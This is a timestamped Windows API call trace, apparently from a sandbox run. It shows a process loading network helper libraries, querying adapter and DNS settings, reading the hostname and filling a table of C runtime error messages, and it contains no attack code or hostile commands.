	[0099.540] GetLastError () returned 0x0
	[0099.541] SetLastError (dwErrCode=0x0) 
	[0099.541] GetLastError () returned 0x0
	[0099.541] SetLastError (dwErrCode=0x0) 
	[0099.541] GetLastError () returned 0x0
	[0099.541] SetLastError (dwErrCode=0x0) 
	[0099.541] GetLastError () returned 0x0
	[0099.541] SetLastError (dwErrCode=0x0) 
	[0099.541] GetLastError () returned 0x0
	[0099.541] SetLastError (dwErrCode=0x0) 
	[0099.541] GetLastError () returned 0x0
	[0099.541] SetLastError (dwErrCode=0x0) 
	[0099.541] GetLastError () returned 0x0
	[0099.542] SetLastError (dwErrCode=0x0) 
	[0099.542] GetLastError () returned 0x0
	[0099.542] SetLastError (dwErrCode=0x0) 
	[0099.542] GetLastError () returned 0x0
	[0099.542] SetLastError (dwErrCode=0x0) 
	[0099.542] GetLastError () returned 0x0
	[0099.542] SetLastError (dwErrCode=0x0) 
	[0099.542] GetLastError () returned 0x0
	[0099.542] SetLastError (dwErrCode=0x0) 
	[0099.542] GetLastError () returned 0x0
	[0099.542] SetLastError (dwErrCode=0x0) 
	[0099.542] GetLastError () returned 0x0
	[0099.542] SetLastError (dwErrCode=0x0) 
	[0099.542] GetLastError () returned 0x0
	[0099.542] SetLastError (dwErrCode=0x0) 
	[0099.543] GetLastError () returned 0x0
	[0099.543] SetLastError (dwErrCode=0x0) 
	[0099.543] GetLastError () returned 0x0
	[0099.543] SetLastError (dwErrCode=0x0) 
	[0099.543] GetLastError () returned 0x0
	[0099.543] SetLastError (dwErrCode=0x0) 
	[0099.543] GetLastError () returned 0x0
	[0099.543] SetLastError (dwErrCode=0x0) 
	[0099.543] GetLastError () returned 0x0
	[0099.543] SetLastError (dwErrCode=0x0) 
	[0099.543] GetLastError () returned 0x0
	[0099.544] SetLastError (dwErrCode=0x0) 
	[0099.544] GetLastError () returned 0x0
	[0099.544] SetLastError (dwErrCode=0x0) 
	[0099.544] GetLastError () returned 0x0
	[0099.544] SetLastError (dwErrCode=0x0) 
	[0099.544] GetLastError () returned 0x0
	[0099.544] SetLastError (dwErrCode=0x0) 
	[0099.544] GetLastError () returned 0x0
	[0099.544] SetLastError (dwErrCode=0x0) 
	[0099.544] GetLastError () returned 0x0
	[0099.544] SetLastError (dwErrCode=0x0) 
	[0099.544] GetLastError () returned 0x0
	[0099.544] SetLastError (dwErrCode=0x0) 
	[0099.544] GetLastError () returned 0x0
	[0099.544] SetLastError (dwErrCode=0x0) 
	[0099.545] GetLastError () returned 0x0
	[0099.545] SetLastError (dwErrCode=0x0) 
	[0099.545] GetLastError () returned 0x0
	[0099.545] SetLastError (dwErrCode=0x0) 
	[0099.545] GetLastError () returned 0x0
	[0099.545] SetLastError (dwErrCode=0x0) 
	[0099.545] GetLastError () returned 0x0
	[0099.545] SetLastError (dwErrCode=0x0) 
	[0099.545] GetLastError () returned 0x0
	[0099.545] SetLastError (dwErrCode=0x0) 
	[0099.545] GetLastError () returned 0x0
	[0099.545] SetLastError (dwErrCode=0x0) 
	[0099.545] GetLastError () returned 0x0
	[0099.545] SetLastError (dwErrCode=0x0) 
	[0099.545] GetLastError () returned 0x0
	[0099.545] SetLastError (dwErrCode=0x0) 
	[0099.546] GetLastError () returned 0x0
	[0099.546] SetLastError (dwErrCode=0x0) 
	[0099.547] GetLastError () returned 0x0
	[0099.547] SetLastError (dwErrCode=0x0) 
	[0099.547] GetLastError () returned 0x0
	[0099.547] SetLastError (dwErrCode=0x0) 
	[0099.547] GetLastError () returned 0x0
	[0099.547] SetLastError (dwErrCode=0x0) 
	[0099.547] GetLastError () returned 0x0
	[0099.600] SetLastError (dwErrCode=0x0) 
	[0099.600] GetLastError () returned 0x0
	[0099.600] SetLastError (dwErrCode=0x0) 
	[0099.600] GetLastError () returned 0x0
	[0099.601] SetLastError (dwErrCode=0x0) 
	[0099.601] GetLastError () returned 0x0
	[0099.601] SetLastError (dwErrCode=0x0) 
	[0099.601] GetLastError () returned 0x0
	[0099.601] SetLastError (dwErrCode=0x0) 
	[0099.601] GetLastError () returned 0x0
	[0099.601] SetLastError (dwErrCode=0x0) 
	[0099.601] GetLastError () returned 0x0
	[0099.601] SetLastError (dwErrCode=0x0) 
	[0099.601] GetLastError () returned 0x0
	[0099.601] SetLastError (dwErrCode=0x0) 
	[0099.601] GetLastError () returned 0x0
	[0099.601] SetLastError (dwErrCode=0x0) 
	[0099.601] GetLastError () returned 0x0
	[0099.602] SetLastError (dwErrCode=0x0) 
	[0099.602] GetLastError () returned 0x0
	[0099.602] SetLastError (dwErrCode=0x0) 
	[0099.602] GetLastError () returned 0x0
	[0099.602] SetLastError (dwErrCode=0x0) 
	[0099.602] GetLastError () returned 0x0
	[0099.602] SetLastError (dwErrCode=0x0) 
	[0099.602] GetLastError () returned 0x0
	[0099.602] SetLastError (dwErrCode=0x0) 
	[0099.602] GetLastError () returned 0x0
	[0099.602] SetLastError (dwErrCode=0x0) 
	[0099.602] GetLastError () returned 0x0
	[0099.602] SetLastError (dwErrCode=0x0) 
	[0099.602] GetLastError () returned 0x0
	[0099.602] SetLastError (dwErrCode=0x0) 
	[0099.602] GetLastError () returned 0x0
	[0099.603] SetLastError (dwErrCode=0x0) 
	[0099.603] GetLastError () returned 0x0
	[0099.603] SetLastError (dwErrCode=0x0) 
	[0099.603] GetLastError () returned 0x0
	[0099.603] SetLastError (dwErrCode=0x0) 
	[0099.603] GetLastError () returned 0x0
	[0099.603] SetLastError (dwErrCode=0x0) 
	[0099.603] GetLastError () returned 0x0
	[0099.603] SetLastError (dwErrCode=0x0) 
	[0099.603] GetLastError () returned 0x0
	[0099.603] SetLastError (dwErrCode=0x0) 
	[0099.603] GetLastError () returned 0x0
	[0099.603] SetLastError (dwErrCode=0x0) 
	[0099.603] GetLastError () returned 0x0
	[0099.604] SetLastError (dwErrCode=0x0) 
	[0099.604] GetLastError () returned 0x0
	[0099.604] SetLastError (dwErrCode=0x0) 
	[0099.604] GetLastError () returned 0x0
	[0099.604] SetLastError (dwErrCode=0x0) 
	[0099.604] GetLastError () returned 0x0
	[0099.604] SetLastError (dwErrCode=0x0) 
	[0099.604] GetLastError () returned 0x0
	[0099.604] SetLastError (dwErrCode=0x0) 
	[0099.604] GetLastError () returned 0x0
	[0099.604] SetLastError (dwErrCode=0x0) 
	[0099.604] GetLastError () returned 0x0
	[0099.604] SetLastError (dwErrCode=0x0) 
	[0099.604] GetLastError () returned 0x0
	[0099.604] SetLastError (dwErrCode=0x0) 
	[0099.605] GetLastError () returned 0x0
	[0099.605] SetLastError (dwErrCode=0x0) 
	[0099.605] GetLastError () returned 0x0
	[0099.605] SetLastError (dwErrCode=0x0) 
	[0099.605] GetLastError () returned 0x0
	[0099.605] SetLastError (dwErrCode=0x0) 
	[0099.605] GetLastError () returned 0x0
	[0099.605] SetLastError (dwErrCode=0x0) 
	[0099.605] GetLastError () returned 0x0
	[0099.605] SetLastError (dwErrCode=0x0) 
	[0099.605] GetLastError () returned 0x0
	[0099.605] SetLastError (dwErrCode=0x0) 
	[0099.605] GetLastError () returned 0x0
	[0099.605] SetLastError (dwErrCode=0x0) 
	[0099.605] GetLastError () returned 0x0
	[0099.606] SetLastError (dwErrCode=0x0) 
	[0099.606] GetLastError () returned 0x0
	[0099.606] SetLastError (dwErrCode=0x0) 
	[0099.606] GetLastError () returned 0x0
	[0099.606] SetLastError (dwErrCode=0x0) 
	[0099.606] GetLastError () returned 0x0
	[0099.606] SetLastError (dwErrCode=0x0) 
	[0099.606] GetLastError () returned 0x0
	[0099.606] SetLastError (dwErrCode=0x0) 
	[0099.606] GetLastError () returned 0x0
	[0099.606] SetLastError (dwErrCode=0x0) 
	[0099.606] GetLastError () returned 0x0
	[0099.606] SetLastError (dwErrCode=0x0) 
	[0099.606] GetLastError () returned 0x0
	[0099.607] SetLastError (dwErrCode=0x0) 
	[0099.607] GetLastError () returned 0x0
	[0099.607] SetLastError (dwErrCode=0x0) 
	[0099.607] GetLastError () returned 0x0
	[0099.607] SetLastError (dwErrCode=0x0) 
	[0099.607] GetLastError () returned 0x0
	[0099.607] SetLastError (dwErrCode=0x0) 
	[0099.607] GetLastError () returned 0x0
	[0099.607] SetLastError (dwErrCode=0x0) 
	[0099.607] GetLastError () returned 0x0
	[0099.607] SetLastError (dwErrCode=0x0) 
	[0099.607] GetLastError () returned 0x0
	[0099.607] SetLastError (dwErrCode=0x0) 
	[0099.607] GetLastError () returned 0x0
	[0099.608] SetLastError (dwErrCode=0x0) 
	[0099.608] GetLastError () returned 0x0
	[0099.608] SetLastError (dwErrCode=0x0) 
	[0099.608] GetLastError () returned 0x0
	[0099.608] SetLastError (dwErrCode=0x0) 
	[0099.608] GetLastError () returned 0x0
	[0099.608] SetLastError (dwErrCode=0x0) 
	[0099.608] GetLastError () returned 0x0
	[0099.608] SetLastError (dwErrCode=0x0) 
	[0099.608] GetLastError () returned 0x0
	[0099.608] SetLastError (dwErrCode=0x0) 
	[0099.608] GetLastError () returned 0x0
	[0099.608] SetLastError (dwErrCode=0x0) 
	[0099.608] GetLastError () returned 0x0
	[0099.608] SetLastError (dwErrCode=0x0) 
	[0099.609] GetLastError () returned 0x0
	[0099.609] SetLastError (dwErrCode=0x0) 
	[0099.609] GetLastError () returned 0x0
	[0099.609] SetLastError (dwErrCode=0x0) 
	[0099.609] GetLastError () returned 0x0
	[0099.609] SetLastError (dwErrCode=0x0) 
	[0099.609] GetLastError () returned 0x0
	[0099.609] SetLastError (dwErrCode=0x0) 
	[0099.609] GetLastError () returned 0x0
	[0099.609] SetLastError (dwErrCode=0x0) 
	[0099.609] GetLastError () returned 0x0
	[0099.609] SetLastError (dwErrCode=0x0) 
	[0099.609] GetLastError () returned 0x0
	[0099.610] SetLastError (dwErrCode=0x0) 
	[0099.610] GetLastError () returned 0x0
	[0099.610] SetLastError (dwErrCode=0x0) 
	[0099.610] GetLastError () returned 0x0
	[0099.610] SetLastError (dwErrCode=0x0) 
	[0099.610] GetLastError () returned 0x0
	[0099.610] SetLastError (dwErrCode=0x0) 
	[0099.610] GetLastError () returned 0x0
	[0099.610] SetLastError (dwErrCode=0x0) 
	[0099.610] GetLastError () returned 0x0
	[0099.610] SetLastError (dwErrCode=0x0) 
	[0099.610] GetLastError () returned 0x0
	[0099.610] SetLastError (dwErrCode=0x0) 
	[0099.610] GetLastError () returned 0x0
	[0099.610] SetLastError (dwErrCode=0x0) 
	[0099.610] GetLastError () returned 0x0
	[0099.611] SetLastError (dwErrCode=0x0) 
	[0099.611] GetLastError () returned 0x0
	[0099.611] SetLastError (dwErrCode=0x0) 
	[0099.611] GetLastError () returned 0x0
	[0099.611] SetLastError (dwErrCode=0x0) 
	[0099.611] GetLastError () returned 0x0
	[0099.611] SetLastError (dwErrCode=0x0) 
	[0099.611] GetLastError () returned 0x0
	[0099.611] SetLastError (dwErrCode=0x0) 
	[0099.611] GetLastError () returned 0x0
	[0099.611] SetLastError (dwErrCode=0x0) 
	[0099.611] GetLastError () returned 0x0
	[0099.611] SetLastError (dwErrCode=0x0) 
	[0099.611] GetLastError () returned 0x0
	[0099.612] SetLastError (dwErrCode=0x0) 
	[0099.612] GetLastError () returned 0x0
	[0099.612] SetLastError (dwErrCode=0x0) 
	[0099.612] GetLastError () returned 0x0
	[0099.612] SetLastError (dwErrCode=0x0) 
	[0099.612] GetLastError () returned 0x0
	[0099.612] SetLastError (dwErrCode=0x0) 
	[0099.612] GetLastError () returned 0x0
	[0099.612] SetLastError (dwErrCode=0x0) 
	[0099.612] GetLastError () returned 0x0
	[0099.612] SetLastError (dwErrCode=0x0) 
	[0099.612] GetLastError () returned 0x0
	[0099.612] SetLastError (dwErrCode=0x0) 
	[0099.612] GetLastError () returned 0x0
	[0099.613] SetLastError (dwErrCode=0x0) 
	[0099.613] GetLastError () returned 0x0
	[0099.613] SetLastError (dwErrCode=0x0) 
	[0099.613] GetLastError () returned 0x0
	[0099.613] SetLastError (dwErrCode=0x0) 
	[0099.613] GetLastError () returned 0x0
	[0099.613] SetLastError (dwErrCode=0x0) 
	[0099.613] GetLastError () returned 0x0
	[0099.613] SetLastError (dwErrCode=0x0) 
	[0099.613] GetLastError () returned 0x0
	[0099.613] SetLastError (dwErrCode=0x0) 
	[0099.613] GetLastError () returned 0x0
	[0099.613] SetLastError (dwErrCode=0x0) 
	[0099.614] GetLastError () returned 0x0
	[0099.614] SetLastError (dwErrCode=0x0) 
	[0099.614] GetLastError () returned 0x0
	[0099.614] SetLastError (dwErrCode=0x0) 
	[0099.614] GetLastError () returned 0x0
	[0099.614] SetLastError (dwErrCode=0x0) 
	[0099.614] GetLastError () returned 0x0
	[0099.614] SetLastError (dwErrCode=0x0) 
	[0099.614] GetLastError () returned 0x0
	[0099.614] SetLastError (dwErrCode=0x0) 
	[0099.614] GetLastError () returned 0x0
	[0099.614] SetLastError (dwErrCode=0x0) 
	[0099.623] SetLastError (dwErrCode=0x0) 
	[0099.623] GetLastError () returned 0x0
	[0099.623] SetLastError (dwErrCode=0x0) 
	[0099.623] LoadLibraryA (lpLibFileName="iphlpapi.dll") returned 0x71d30000
	[0099.624] GetProcAddress (hModule=0x71d30000, lpProcName="GetNetworkParams") returned 0x71d3c4f0
	[0099.624] GetProcAddress (hModule=0x71d30000, lpProcName="GetAdaptersAddresses") returned 0x71d35b70
	[0099.624] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74aa0000
	[0099.624] GetProcAddress (hModule=0x74aa0000, lpProcName="SystemFunction036") returned 0x74682a60
	[0099.625] SetLastError (dwErrCode=0x0) 
	[0099.625] GetLastError () returned 0x0
	[0099.625] SetLastError (dwErrCode=0x0) 
	[0099.625] GetLastError () returned 0x0
	[0099.625] SetLastError (dwErrCode=0x0) 
	[0099.625] GetLastError () returned 0x0
	[0099.625] SetLastError (dwErrCode=0x0) 
	[0099.625] GetLastError () returned 0x0
	[0099.625] SetLastError (dwErrCode=0x0) 
	[0099.625] GetLastError () returned 0x0
	[0099.625] SetLastError (dwErrCode=0x0) 
	[0099.626] GetLastError () returned 0x0
	[0099.626] SetLastError (dwErrCode=0x0) 
	[0099.626] GetLastError () returned 0x0
	[0099.626] SetLastError (dwErrCode=0x0) 
	[0099.626] GetLastError () returned 0x0
	[0099.626] SetLastError (dwErrCode=0x0) 
	[0099.626] GetLastError () returned 0x0
	[0099.626] SetLastError (dwErrCode=0x0) 
	[0099.626] GetLastError () returned 0x0
	[0099.626] SetLastError (dwErrCode=0x0) 
	[0099.626] GetLastError () returned 0x0
	[0099.626] SetLastError (dwErrCode=0x0) 
	[0099.626] GetLastError () returned 0x0
	[0099.626] SetLastError (dwErrCode=0x0) 
	[0099.626] GetLastError () returned 0x0
	[0099.627] SetLastError (dwErrCode=0x0) 
	[0099.627] GetLastError () returned 0x0
	[0099.627] SetLastError (dwErrCode=0x0) 
	[0099.627] GetLastError () returned 0x0
	[0099.627] SetLastError (dwErrCode=0x0) 
	[0099.627] GetLastError () returned 0x0
	[0099.627] SetLastError (dwErrCode=0x0) 
	[0099.627] GetLastError () returned 0x0
	[0099.627] SetLastError (dwErrCode=0x0) 
	[0099.627] GetLastError () returned 0x0
	[0099.627] SetLastError (dwErrCode=0x0) 
	[0099.627] GetLastError () returned 0x0
	[0099.627] SetLastError (dwErrCode=0x0) 
	[0099.628] GetAdaptersAddresses () returned 0x0
	[0099.757] GetLastError () returned 0x0
	[0099.757] SetLastError (dwErrCode=0x0) 
	[0099.757] GetLastError () returned 0x0
	[0099.758] SetLastError (dwErrCode=0x0) 
	[0099.758] SetLastError (dwErrCode=0x0) 
	[0099.758] GetLastError () returned 0x0
	[0099.758] SetLastError (dwErrCode=0x0) 
	[0099.758] GetLastError () returned 0x0
	[0099.758] SetLastError (dwErrCode=0x0) 
	[0099.758] GetLastError () returned 0x0
	[0099.758] SetLastError (dwErrCode=0x0) 
	[0099.758] GetLastError () returned 0x0
	[0099.758] SetLastError (dwErrCode=0x0) 
	[0099.758] GetLastError () returned 0x0
	[0099.758] SetLastError (dwErrCode=0x0) 
	[0099.758] GetLastError () returned 0x0
	[0099.758] SetLastError (dwErrCode=0x0) 
	[0099.759] GetLastError () returned 0x0
	[0099.759] SetLastError (dwErrCode=0x0) 
	[0099.759] GetLastError () returned 0x0
	[0099.759] SetLastError (dwErrCode=0x0) 
	[0099.759] GetLastError () returned 0x0
	[0099.759] SetLastError (dwErrCode=0x0) 
	[0099.759] SetLastError (dwErrCode=0x0) 
	[0099.759] GetLastError () returned 0x0
	[0099.759] SetLastError (dwErrCode=0x0) 
	[0099.759] strncmp (_Str1="fec0:0:0:ffff:", _Str2="fec0:0:0:ffff:", _MaxCount=0xe) returned 0
	[0099.759] strncmp (_Str1="fec0:0:0:ffff:", _Str2="fec0:0:0:ffff:", _MaxCount=0xe) returned 0
	[0099.759] GetLastError () returned 0x0
	[0099.759] SetLastError (dwErrCode=0x0) 
	[0099.759] GetLastError () returned 0x0
	[0099.759] SetLastError (dwErrCode=0x0) 
	[0099.760] SetLastError (dwErrCode=0x0) 
	[0099.760] GetLastError () returned 0x0
	[0099.760] SetLastError (dwErrCode=0x0) 
	[0099.760] SetLastError (dwErrCode=0x2) 
	[0099.760] GetLastError () returned 0x2
	[0099.761] htons (hostshort=0x35) returned 0x3500
	[0099.761] htons (hostshort=0x35) returned 0x3500
	[0099.761] gethostname (in: name=0x26bf618, namelen=64 | out: name="x2vS1cum") returned 0
	[0100.326] SystemFunction036 (in: RandomBuffer=0x528f67e, RandomBufferLength=0x1f | out: RandomBuffer=0x528f67e) returned 1
	[0100.326] SetLastError (dwErrCode=0x0) 
	[0100.326] GetLastError () returned 0x0
	[0100.326] SetLastError (dwErrCode=0x0) 
	[0100.326] SetLastError (dwErrCode=0x0) 
	[0100.326] GetLastError () returned 0x0
	[0100.327] SetLastError (dwErrCode=0x0) 
	[0100.327] SetLastError (dwErrCode=0x0) 
	[0100.327] GetLastError () returned 0x0
	[0100.327] SetLastError (dwErrCode=0x0) 
	[0100.327] SetLastError (dwErrCode=0x0) 
	[0100.327] GetLastError () returned 0x0
	[0100.327] SetLastError (dwErrCode=0x0) 
	[0100.339] SetLastError (dwErrCode=0x0) 
	[0100.339] GetLastError () returned 0x0
	[0100.339] SetLastError (dwErrCode=0x0) 
	[0100.339] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x798
	[0100.340] SetLastError (dwErrCode=0x0) 
	[0100.340] SetLastError (dwErrCode=0x0) 
	[0100.340] strncpy (in: _Dest=0x44a8150, _Source="No such file or directory", _Count=0x20 | out: _Dest="No such file or directory") returned="No such file or directory"
	[0100.340] GetLastError () returned 0x0
	[0100.341] SetLastError (dwErrCode=0x0) 
	[0100.341] strncpy (in: _Dest=0x44a8170, _Source="No such process", _Count=0x20 | out: _Dest="No such process") returned="No such process"
	[0100.341] GetLastError () returned 0x0
	[0100.341] SetLastError (dwErrCode=0x0) 
	[0100.341] strncpy (in: _Dest=0x44a8190, _Source="Interrupted function call", _Count=0x20 | out: _Dest="Interrupted function call") returned="Interrupted function call"
	[0100.341] GetLastError () returned 0x0
	[0100.341] SetLastError (dwErrCode=0x0) 
	[0100.341] strncpy (in: _Dest=0x44a81b0, _Source="Input/output error", _Count=0x20 | out: _Dest="Input/output error") returned="Input/output error"
	[0100.341] GetLastError () returned 0x0
	[0100.341] SetLastError (dwErrCode=0x0) 
	[0100.341] strncpy (in: _Dest=0x44a81d0, _Source="No such device or address", _Count=0x20 | out: _Dest="No such device or address") returned="No such device or address"
	[0100.341] GetLastError () returned 0x0
	[0100.341] SetLastError (dwErrCode=0x0) 
	[0100.341] strncpy (in: _Dest=0x44a81f0, _Source="Arg list too long", _Count=0x20 | out: _Dest="Arg list too long") returned="Arg list too long"
	[0100.341] GetLastError () returned 0x0
	[0100.341] SetLastError (dwErrCode=0x0) 
	[0100.341] strncpy (in: _Dest=0x44a8210, _Source="Exec format error", _Count=0x20 | out: _Dest="Exec format error") returned="Exec format error"
	[0100.342] GetLastError () returned 0x0
	[0100.342] SetLastError (dwErrCode=0x0) 
	[0100.342] strncpy (in: _Dest=0x44a8230, _Source="Bad file descriptor", _Count=0x20 | out: _Dest="Bad file descriptor") returned="Bad file descriptor"
	[0100.342] GetLastError () returned 0x0
	[0100.342] SetLastError (dwErrCode=0x0) 
	[0100.342] strncpy (in: _Dest=0x44a8250, _Source="No child processes", _Count=0x20 | out: _Dest="No child processes") returned="No child processes"
	[0100.342] GetLastError () returned 0x0
	[0100.342] SetLastError (dwErrCode=0x0) 
	[0100.342] strncpy (in: _Dest=0x44a8270, _Source="Resource temporarily unavailable", _Count=0x20 | out: _Dest="Resource temporarily unavailable") returned="Resource temporarily unavailable"
	[0100.342] GetLastError () returned 0x0
	[0100.342] SetLastError (dwErrCode=0x0) 
	[0100.342] strncpy (in: _Dest=0x44a8290, _Source="Not enough space", _Count=0x20 | out: _Dest="Not enough space") returned="Not enough space"
	[0100.342] GetLastError () returned 0x0
	[0100.342] SetLastError (dwErrCode=0x0) 
	[0100.342] strncpy (in: _Dest=0x44a82b0, _Source="Permission denied", _Count=0x20 | out: _Dest="Permission denied") returned="Permission denied"
	[0100.342] GetLastError () returned 0x0
	[0100.343] SetLastError (dwErrCode=0x0) 
	[0100.343] strncpy (in: _Dest=0x44a82d0, _Source="Bad address", _Count=0x20 | out: _Dest="Bad address") returned="Bad address"
	[0100.343] GetLastError () returned 0x0
	[0100.343] SetLastError (dwErrCode=0x0) 
	[0100.343] strncpy (in: _Dest=0x44a82f0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.343] GetLastError () returned 0x0
	[0100.343] SetLastError (dwErrCode=0x0) 
	[0100.343] strncpy (in: _Dest=0x44a8310, _Source="Resource device", _Count=0x20 | out: _Dest="Resource device") returned="Resource device"
	[0100.343] GetLastError () returned 0x0
	[0100.343] SetLastError (dwErrCode=0x0) 
	[0100.343] strncpy (in: _Dest=0x44a8330, _Source="File exists", _Count=0x20 | out: _Dest="File exists") returned="File exists"
	[0100.343] GetLastError () returned 0x0
	[0100.343] SetLastError (dwErrCode=0x0) 
	[0100.343] strncpy (in: _Dest=0x44a8350, _Source="Improper link", _Count=0x20 | out: _Dest="Improper link") returned="Improper link"
	[0100.343] GetLastError () returned 0x0
	[0100.343] SetLastError (dwErrCode=0x0) 
	[0100.343] strncpy (in: _Dest=0x44a8370, _Source="No such device", _Count=0x20 | out: _Dest="No such device") returned="No such device"
	[0100.343] GetLastError () returned 0x0
	[0100.343] SetLastError (dwErrCode=0x0) 
	[0100.344] strncpy (in: _Dest=0x44a8390, _Source="Not a directory", _Count=0x20 | out: _Dest="Not a directory") returned="Not a directory"
	[0100.344] GetLastError () returned 0x0
	[0100.344] SetLastError (dwErrCode=0x0) 
	[0100.344] strncpy (in: _Dest=0x44a83b0, _Source="Is a directory", _Count=0x20 | out: _Dest="Is a directory") returned="Is a directory"
	[0100.344] GetLastError () returned 0x0
	[0100.344] SetLastError (dwErrCode=0x0) 
	[0100.344] strncpy (in: _Dest=0x44a83d0, _Source="Invalid argument", _Count=0x20 | out: _Dest="Invalid argument") returned="Invalid argument"
	[0100.344] GetLastError () returned 0x0
	[0100.344] SetLastError (dwErrCode=0x0) 
	[0100.344] strncpy (in: _Dest=0x44a83f0, _Source="Too many open files in system", _Count=0x20 | out: _Dest="Too many open files in system") returned="Too many open files in system"
	[0100.344] GetLastError () returned 0x0
	[0100.344] SetLastError (dwErrCode=0x0) 
	[0100.344] strncpy (in: _Dest=0x44a8410, _Source="Too many open files", _Count=0x20 | out: _Dest="Too many open files") returned="Too many open files"
	[0100.344] GetLastError () returned 0x0
	[0100.344] SetLastError (dwErrCode=0x0) 
	[0100.344] strncpy (in: _Dest=0x44a8430, _Source="Inappropriate I/O control operation", _Count=0x20 | out: _Dest="Inappropriate I/O control operat") returned="Inappropriate I/O control operat"
	[0100.344] GetLastError () returned 0x0
	[0100.345] SetLastError (dwErrCode=0x0) 
	[0100.345] strncpy (in: _Dest=0x44a8450, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.345] GetLastError () returned 0x0
	[0100.345] SetLastError (dwErrCode=0x0) 
	[0100.345] strncpy (in: _Dest=0x44a8470, _Source="File too large", _Count=0x20 | out: _Dest="File too large") returned="File too large"
	[0100.345] GetLastError () returned 0x0
	[0100.345] SetLastError (dwErrCode=0x0) 
	[0100.345] strncpy (in: _Dest=0x44a8490, _Source="No space left on device", _Count=0x20 | out: _Dest="No space left on device") returned="No space left on device"
	[0100.345] GetLastError () returned 0x0
	[0100.345] SetLastError (dwErrCode=0x0) 
	[0100.345] strncpy (in: _Dest=0x44a84b0, _Source="Invalid seek", _Count=0x20 | out: _Dest="Invalid seek") returned="Invalid seek"
	[0100.345] GetLastError () returned 0x0
	[0100.345] SetLastError (dwErrCode=0x0) 
	[0100.345] strncpy (in: _Dest=0x44a84d0, _Source="Read-only file system", _Count=0x20 | out: _Dest="Read-only file system") returned="Read-only file system"
	[0100.345] GetLastError () returned 0x0
	[0100.345] SetLastError (dwErrCode=0x0) 
	[0100.345] strncpy (in: _Dest=0x44a84f0, _Source="Too many links", _Count=0x20 | out: _Dest="Too many links") returned="Too many links"
	[0100.345] GetLastError () returned 0x0
	[0100.346] SetLastError (dwErrCode=0x0) 
	[0100.346] strncpy (in: _Dest=0x44a8510, _Source="Broken pipe", _Count=0x20 | out: _Dest="Broken pipe") returned="Broken pipe"
	[0100.346] GetLastError () returned 0x0
	[0100.346] SetLastError (dwErrCode=0x0) 
	[0100.346] strncpy (in: _Dest=0x44a8530, _Source="Domain error", _Count=0x20 | out: _Dest="Domain error") returned="Domain error"
	[0100.346] GetLastError () returned 0x0
	[0100.346] SetLastError (dwErrCode=0x0) 
	[0100.346] strncpy (in: _Dest=0x44a8550, _Source="Result too large", _Count=0x20 | out: _Dest="Result too large") returned="Result too large"
	[0100.346] GetLastError () returned 0x0
	[0100.346] SetLastError (dwErrCode=0x0) 
	[0100.346] strncpy (in: _Dest=0x44a8570, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.346] GetLastError () returned 0x0
	[0100.346] SetLastError (dwErrCode=0x0) 
	[0100.346] strncpy (in: _Dest=0x44a8590, _Source="Resource deadlock avoided", _Count=0x20 | out: _Dest="Resource deadlock avoided") returned="Resource deadlock avoided"
	[0100.346] GetLastError () returned 0x0
	[0100.346] SetLastError (dwErrCode=0x0) 
	[0100.346] strncpy (in: _Dest=0x44a85b0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.346] GetLastError () returned 0x0
	[0100.347] SetLastError (dwErrCode=0x0) 
	[0100.347] strncpy (in: _Dest=0x44a85d0, _Source="Filename too long", _Count=0x20 | out: _Dest="Filename too long") returned="Filename too long"
	[0100.347] GetLastError () returned 0x0
	[0100.347] SetLastError (dwErrCode=0x0) 
	[0100.347] strncpy (in: _Dest=0x44a85f0, _Source="No locks available", _Count=0x20 | out: _Dest="No locks available") returned="No locks available"
	[0100.347] GetLastError () returned 0x0
	[0100.347] SetLastError (dwErrCode=0x0) 
	[0100.347] strncpy (in: _Dest=0x44a8610, _Source="Function not implemented", _Count=0x20 | out: _Dest="Function not implemented") returned="Function not implemented"
	[0100.347] GetLastError () returned 0x0
	[0100.347] SetLastError (dwErrCode=0x0) 
	[0100.347] strncpy (in: _Dest=0x44a8630, _Source="Directory not empty", _Count=0x20 | out: _Dest="Directory not empty") returned="Directory not empty"
	[0100.347] GetLastError () returned 0x0
	[0100.347] SetLastError (dwErrCode=0x0) 
	[0100.347] strncpy (in: _Dest=0x44a8650, _Source="Illegal byte sequence", _Count=0x20 | out: _Dest="Illegal byte sequence") returned="Illegal byte sequence"
	[0100.347] GetLastError () returned 0x0
	[0100.347] SetLastError (dwErrCode=0x0) 
	[0100.347] strncpy (in: _Dest=0x44a8670, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.347] GetLastError () returned 0x0
	[0100.347] SetLastError (dwErrCode=0x0) 
	[0100.348] strncpy (in: _Dest=0x44a8690, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.348] GetLastError () returned 0x0
	[0100.348] SetLastError (dwErrCode=0x0) 
	[0100.348] strncpy (in: _Dest=0x44a86b0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.348] GetLastError () returned 0x0
	[0100.348] SetLastError (dwErrCode=0x0) 
	[0100.348] strncpy (in: _Dest=0x44a86d0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.348] GetLastError () returned 0x0
	[0100.348] SetLastError (dwErrCode=0x0) 
	[0100.348] strncpy (in: _Dest=0x44a86f0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.348] GetLastError () returned 0x0
	[0100.348] SetLastError (dwErrCode=0x0) 
	[0100.348] strncpy (in: _Dest=0x44a8710, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.348] GetLastError () returned 0x0
	[0100.348] SetLastError (dwErrCode=0x0) 
	[0100.348] strncpy (in: _Dest=0x44a8730, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.348] GetLastError () returned 0x0
	[0100.348] SetLastError (dwErrCode=0x0) 
	[0100.348] strncpy (in: _Dest=0x44a8750, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.349] GetLastError () returned 0x0
	[0100.349] SetLastError (dwErrCode=0x0) 
